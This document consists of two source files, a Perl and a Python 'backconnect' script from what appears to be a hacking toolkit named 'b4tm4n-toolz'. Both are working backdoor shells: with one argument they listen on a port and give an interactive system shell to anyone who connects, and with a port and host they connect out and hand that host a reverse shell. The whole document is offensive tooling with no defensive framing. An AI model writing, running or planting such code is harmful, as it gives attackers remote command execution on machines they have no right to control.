File: b4tm4n-toolz/backconnect/back.pl
#!/usr/bin/env perl
use IO::Socket;
$os=$^O;
$sh="export TERM=xterm;PS1='\$PWD\>';export PS1;/bin/sh -i";
if($os=~m/win/i){$sh="%COMSPEC% /K";}
$t=getprotobyname('tcp');
socket(S,&PF_INET,&SOCK_STREAM,$t)||die();
if(@ARGV==1){
	$p=$ARGV[0];
	setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);
	bind(S,sockaddr_in($p,INADDR_ANY))||die();
	listen(S,3)||die();
	accept(C,S);
	send(C,"b4tm4n shell : connected\n",0);
	open STDIN,"<&C";open STDOUT,">&C";open STDERR,">&C";
	exec $sh||die();
	close(C);close(S);close(STDIN);close(STDOUT);close(STDERR);
	exit 0;
}
elsif(@ARGV==2){
	$p=$ARGV[0];
	$h=$ARGV[1];
	$i=inet_aton($h)||die();
	$a=sockaddr_in($p,$i)||die();
	connect(S,$a)||die();
	send(S,"b4tm4n shell : connected\n",0);
	open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");
	exec $sh||die();
	close(S);close(STDIN);close(STDOUT);close(STDERR);
}
else{exit(1);}

File: b4tm4n-toolz/backconnect/back.py
#!/usr/bin/env python
import re,subprocess,os,sys,socket,time
p=""
h=""
def shell(c):
	proc=subprocess.Popen(c,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)
	return proc.stdout.read()+proc.stderr.read()+prompt().encode('utf-8')

def action(c):
	if os.name!="nt":
		f=c.fileno()
		os.system("export TERM=xterm;PS1='$PWD>';export PS1;/bin/sh -i <&"+str(f)+" >&"+str(f)+" 2>&"+str(f))
	else:
		while True:
			try:
				r=c.recv(1024).decode("utf-8")
			except:
				pass
			else:
				if len(r)>0:
					b=re.search("cd\ ([^\s]+)",r,flags=re.IGNORECASE)
					if b:
						if os.path.isdir(b.group(1)):
							os.chdir(b.group(1))
						c.send(prompt().encode('utf-8'))
					else:
						out=shell(r)
						if out and len(out)>0:c.send(out)
				else: return False

def prompt():
	return "\n"+os.getcwd()+">"
g=sys.argv
if len(g)==2:
	p=g[1]
elif len(g)==3:
	p=g[1]
	h=g[2]
else:exit(1)
p=int(p)
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
if len(g)==2:
	s.bind(("0.0.0.0",p))
	s.listen(5)
	try:(c,a)=s.accept()
	except:
		time.sleep(1)
	else:
		if os.name!="nt":
			c.send(("b4tm4n shell : connected\n").encode('utf-8'))
		else:
			c.send(("b4tm4n shell : connected"+prompt()).encode('utf-8'))
		action(c)
if len(g)==3:
	try: s.connect((h,p))
	except:
		time.sleep(5)
	else:
		if os.name!="nt":
			s.send(("b4tm4n shell : connected\n").encode('utf-8'))
		else:
			s.send(("b4tm4n shell : connected"+prompt()).encode('utf-8'))
		action(s)